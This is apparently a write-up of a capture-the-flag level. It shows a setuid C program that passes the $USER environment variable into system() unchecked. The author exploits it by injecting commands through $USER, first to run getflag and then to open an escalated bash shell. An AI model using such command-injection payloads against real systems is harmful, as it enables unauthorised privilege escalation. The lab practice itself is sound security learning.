The information about this level says:

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it?
To do this level, log in as the level02 account with the password level02 . Files for this level can be found in /home/flag02.

It also contains some source code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
 
int main(int argc, char **argv, char **envp)
{
    char *buffer;
 
    gid_t gid;
    uid_t uid;
 
    gid = getegid();
    uid = geteuid();
 
    setresgid(gid, gid, gid);
    setresuid(uid, uid, uid);
 
    buffer = NULL;
 
    asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
    printf("about to call system(\"%s\")\n", buffer);
 
    system(buffer);
}

This is similar to the Level 01. An environment variable $USER is being used to construct a string that is printed to the screen before being run. If we can edit that environment variable, we can inject a malicious command.

Initially I changed $USER so that running the program would execute getflag. The command I used was:

USER=;getflag;echo

I’ll break this down:
; – end the command and start a new one
getflag – run the getflag program
; – end the command and start a new one
echo – start a new echo command so that the following arguments don’t cause an error

This results in the following command being run:

/bin/echo ;getflag;echo is cool

I got a success message from get flag, but I wanted shell, so I changed my command to:

USER="Opening escalated shell...;bin/bash;echo Closing pwned shell, now that"

This time I got shell, and some cool text when going into the shell and when coming out (after typing exit)